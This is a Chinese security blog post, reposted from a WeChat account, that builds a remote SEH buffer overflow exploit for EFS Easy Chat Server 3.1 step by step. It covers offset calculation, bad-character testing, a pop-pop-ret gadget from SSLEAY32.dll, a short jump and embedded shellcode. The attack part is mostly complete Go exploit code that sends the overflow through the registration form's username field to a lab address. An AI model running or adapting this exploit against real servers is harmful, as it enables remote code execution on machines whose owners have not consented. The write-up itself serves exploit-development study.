EFS Easy Chat Server 3.1 远程seh缓冲区溢出

admin 2024年4月9日14:39:22评论9 views字数 12085阅读40分17秒阅读模式

exploit-db  https://www.exploit-db.com/exploits/42155

> 下载链接  https://www.exploit-db.com/apps/c682138ebbea9af7948a3f142bbd054b-ecssetup.exe

---

## 1. 基础信息

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

## 2. 写个PoC

- 安装后效果如图

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

-`expdb`上面的代码**缓冲区溢出**触发点在注册页面的**用户名**处,使用`burpsuite`抓个包然后直接插件`copy as go request`

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

package mainimport (    "bytes"    "crypto/tls"    "encoding/binary"    "fmt"    "io"    "net/http"    "strings")func main() {    payload := strings.Repeat("x41", 1000)    headers := map[string]string{        "Host":            "10.11.11.8",        "Content-Length":  "179",        "Origin":          "http://10.11.11.8",        "Content-Type":    "application/x-www-form-urlencoded",        "User-Agent":      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0",        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Referer":         "http://10.11.11.8/register.ghp",        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",        "Connection":      "close",    }    var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")    httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {    request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))    for k, v := range headers {        request.Header.Set(k, v)    }    customTransport := &http.Transport{        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    }    client := &http.Client{Transport: customTransport}    response, error := client.Do(request)    defer response.Body.Close()    if error != nil {        panic(error)    }    body, _ := io.ReadAll(response.Body)    fmt.Println("response Status:", response.Status)    fmt.Println("response Body:", string(body))    return response}

## 3. 定位offset

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 生成1000有序字符串替换`x41`,然后发送数据包

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 崩了,`g`一下

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- `EIP`指令指针的值是**34684133**

```bash

┌──(root㉿kali)-[~]

└─#msf-pattern_offset-q34684133-l1000

[*] Exact match at offset 221

┌──(root㉿kali)-[~]

└─#

```

> 但是查看`ESP`等寄存器发现并没有想要的内容,通过查看`Exception Handler`发现崩溃点

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

> 当前的错误处理机制的指令地址被覆盖,造成`SEH(Structured Exception Handling Windows默认异常处理机制)`污染,而被污染的`SEH`可根据实际情况进行代码执行攻击。

## 4. 坏字符串

生成字符串并排除 **x00** `!py mona ba -cpb "x00"`

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 现在知道 **221**个字符串可造成`seh`污染,那么对`SEH`攻击需要执行 **ppr**`pop 某个寄存器 pop 某个寄存器 ret`指令,那么需要崩溃长度减去一条指令的长度即 **-4**,修改`PoC`

package mainimport (    "bytes"    "crypto/tls"    "fmt"    "io"    "net/http"    "strings")func main() {    payload := strings.Repeat("x41", 217)    payload += "BBBBCCCC"    payload += "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"    payload += strings.Repeat("x44", 1000-len(payload))    headers := map[string]string{        "Host":            "10.11.11.8",        "Content-Length":  "179",        "Origin":          "http://10.11.11.8",        "Content-Type":    "application/x-www-form-urlencoded",        "User-Agent":      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0",        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Referer":         "http://10.11.11.8/register.ghp",        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",        "Connection":      "close",    }    var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")    httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {    request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))    for k, v := range headers {        request.Header.Set(k, v)    }    customTransport := &http.Transport{        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    }    client := &http.Client{Transport: customTransport}    response, error := client.Do(request)    defer response.Body.Close()    if error != nil {        panic(error)    }    body, _ := io.ReadAll(response.Body)    fmt.Println("response Status:", response.Status)    fmt.Println("response Body:", string(body))    return response}

- 重启`windbg`后附加到程序,然后发送数据包并自动化对比

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

## 5. 寻找PPR

- 使用`mona`自己去找这个指令发现了一大堆,但是相信能用的也没几个

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 一大堆的**00**让人头疼啊

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 既然不行就排除吧

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 现在好了,世界清净了不少,只有**190**个,随便选一个吧

`0x10018793 |   0x10018793 : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0`

- 所有的保护属性都是**false**,而且还不含有`badchars`,美滋儿滋儿~

- 验证一下

package mainimport (    "bytes"    "crypto/tls"    "encoding/binary"    "fmt"    "io"    "net/http"    "strings")func main() {    seh := make([]byte, 4)    binary.LittleEndian.PutUint32(seh, 0x10018793)    payload := strings.Repeat("x41", 217)    payload += "BBBB"    payload += string(seh) //0x10018793 |   0x10018793 : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0    payload += strings.Repeat("x44", 1000-len(payload))    headers := map[string]string{        "Host":            "10.11.11.8",        "Content-Length":  "179",        "Origin":          "http://10.11.11.8",        "Content-Type":    "application/x-www-form-urlencoded",        "User-Agent":      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0",        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Referer":         "http://10.11.11.8/register.ghp",        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",        "Connection":      "close",    }    var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")    httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {    request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))    for k, v := range headers {        request.Header.Set(k, v)    }    customTransport := &http.Transport{        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    }    client := &http.Client{Transport: customTransport}    response, error := client.Do(request)    defer response.Body.Close()    if error != nil {        panic(error)    }    body, _ := io.ReadAll(response.Body)    fmt.Println("response Status:", response.Status)    fmt.Println("response Body:", string(body))    return response}

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 重启程序、附加程序、打个断点,g一下,发送数据一条龙服务

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 崩了,`g`一下

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 很好,`t`三下,看`ret`到哪里

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- **4个** `B`,那么有限的指令,只能做跳转了。

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 让代码跳转到这里似乎就成了最优解

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 得到的代码是`eb 06` 那么还得看看接下来有多大的操作空间

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 内存中结束的地方的地址是**045c7120**,减去当前的地址看看有多大的空间。

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 768个字节,够用了。 直接 `x90`做个顺滑然后写`shellcode`

package mainimport (    "bytes"    "crypto/tls"    "encoding/binary"    "fmt"    "io"    "net/http"    "strings")func main() {    seh := make([]byte, 4)    binary.LittleEndian.PutUint32(seh, 0x10018793)    payload := strings.Repeat("x41", 217)    payload += "x90x90xebx06"    payload += string(seh) //0x10018793 |   0x10018793 : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0    payload += strings.Repeat("x44", 1000-len(payload))    headers := map[string]string{        "Host":            "10.11.11.8",        "Content-Length":  "179",        "Origin":          "http://10.11.11.8",        "Content-Type":    "application/x-www-form-urlencoded",        "User-Agent":      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0",        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",        "Referer":         "http://10.11.11.8/register.ghp",        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",        "Connection":      "close",    }    var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")    httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {    request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))    for k, v := range headers {        request.Header.Set(k, v)    }    customTransport := &http.Transport{        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},    }    client := &http.Client{Transport: customTransport}    response, error := client.Do(request)    defer response.Body.Close()    if error != nil {        panic(error)    }    body, _ := io.ReadAll(response.Body)    fmt.Println("response Status:", response.Status)    fmt.Println("response Body:", string(body))    return response}

## 6.小跳一下

- 重启程序,附加程序,打个断点,g一下运行,发包看崩溃一条龙啊

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 很好,跳转成功,直接填充然后写`shellcode`

## 7. 弹计算器

- 生成`shellcode`

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 修改后的代码

package mainimport (  "bytes"  "crypto/tls"  "encoding/binary"  "fmt"  "io"  "net/http"  "strings")func main() {  shellcode := string([]byte{0xbd, 0xfa, 0xd1, 0x0b, 0xc2, 0xda, 0xcd, 0xd9, 0x74,    0x24, 0xf4, 0x5b, 0x29, 0xc9, 0xb1, 0x30, 0x31, 0x6b, 0x13, 0x03, 0x6b,    0x13, 0x83, 0xc3, 0xfe, 0x33, 0xfe, 0x3e, 0x16, 0x31, 0x01, 0xbf, 0xe6,    0x56, 0x8b, 0x5a, 0xd7, 0x56, 0xef, 0x2f, 0x47, 0x67, 0x7b, 0x7d, 0x6b,    0x0c, 0x29, 0x96, 0xf8, 0x60, 0xe6, 0x99, 0x49, 0xce, 0xd0, 0x94, 0x4a,    0x63, 0x20, 0xb6, 0xc8, 0x7e, 0x75, 0x18, 0xf1, 0xb0, 0x88, 0x59, 0x36,    0xac, 0x61, 0x0b, 0xef, 0xba, 0xd4, 0xbc, 0x84, 0xf7, 0xe4, 0x37, 0xd6,    0x16, 0x6d, 0xab, 0xae, 0x19, 0x5c, 0x7a, 0xa5, 0x43, 0x7e, 0x7c, 0x6a,    0xf8, 0x37, 0x66, 0x6f, 0xc5, 0x8e, 0x1d, 0x5b, 0xb1, 0x10, 0xf4, 0x92,    0x3a, 0xbe, 0x39, 0x1b, 0xc9, 0xbe, 0x7e, 0x9b, 0x32, 0xb5, 0x76, 0xd8,    0xcf, 0xce, 0x4c, 0xa3, 0x0b, 0x5a, 0x57, 0x03, 0xdf, 0xfc, 0xb3, 0xb2,    0x0c, 0x9a, 0x30, 0xb8, 0xf9, 0xe8, 0x1f, 0xdc, 0xfc, 0x3d, 0x14, 0xd8,    0x75, 0xc0, 0xfb, 0x69, 0xcd, 0xe7, 0xdf, 0x32, 0x95, 0x86, 0x46, 0x9e,    0x78, 0xb6, 0x99, 0x41, 0x24, 0x12, 0xd1, 0x6f, 0x31, 0x2f, 0xb8, 0xe5,    0xc4, 0xbd, 0xc6, 0x4b, 0xc6, 0xbd, 0xc8, 0xfb, 0xaf, 0x8c, 0x43, 0x94,    0xa8, 0x10, 0x86, 0xd1, 0x57, 0xf3, 0x03, 0x2f, 0xf0, 0xaa, 0xc1, 0x92,    0x9d, 0x4c, 0x3c, 0xd0, 0x9b, 0xce, 0xb5, 0xa8, 0x5f, 0xce, 0xbf, 0xad,    0x24, 0x48, 0x53, 0xdf, 0x35, 0x3d, 0x53, 0x4c, 0x35, 0x14, 0x30, 0x13,    0xa5, 0xf4, 0xb7})  seh := make([]byte, 4)  binary.LittleEndian.PutUint32(seh, 0x10018793)  payload := strings.Repeat("x41", 217)  payload += "x90x90xebx06" // nseh  payload += string(seh)        //0x10018793 |   0x10018793 : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [SSLEAY32.dll] ASLR: False, Rebase: False, SafeSEH: False, CFG: False, OS: False, v-1.0- (C:EFS SoftwareEasy Chat ServerSSLEAY32.dll), 0x0  payload += strings.Repeat("x90", 24)  payload += shellcode  payload += strings.Repeat("x44", 1000-len(payload))  headers := map[string]string{    "Host":            "10.11.11.8",    "Content-Length":  "179",    "Origin":          "http://10.11.11.8",    "Content-Type":    "application/x-www-form-urlencoded",    "User-Agent":      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0",    "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",    "Referer":         "http://10.11.11.8/register.ghp",    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",    "Connection":      "close",  }  var data = []byte("UserName=" + payload + "&Password=admin&Password1=admin&Sex=0&Email=1%40q.com&Icon=0.gif&Resume=a&cw=1&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Register")  httpRequest("http://10.11.11.8:80/registresult.htm", "POST", data, headers)}func httpRequest(targetUrl string, method string, data []byte, headers map[string]string) *http.Response {  request, error := http.NewRequest(method, targetUrl, bytes.NewBuffer(data))  for k, v := range headers {    request.Header.Set(k, v)  }  customTransport := &http.Transport{    TLSClientConfig: &tls.Config{InsecureSkipVerify: true},  }  client := &http.Client{Transport: customTransport}  response, error := client.Do(request)  defer response.Body.Close()  if error != nil {    panic(error)  }  body, _ := io.ReadAll(response.Body)  fmt.Println("response Status:", response.Status)  fmt.Println("response Body:", string(body))  return response}

- 编译

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

- 效果

EFS Easy Chat Server 3.1 远程seh缓冲区溢出

原文始发于微信公众号(瘾大技术差):EFS Easy Chat Server 3.1 远程seh缓冲区溢出

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月9日14:39:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   EFS Easy Chat Server 3.1 远程seh缓冲区溢出https://cn-sec.com/archives/2641135.html

发表评论

匿名网友 填写信息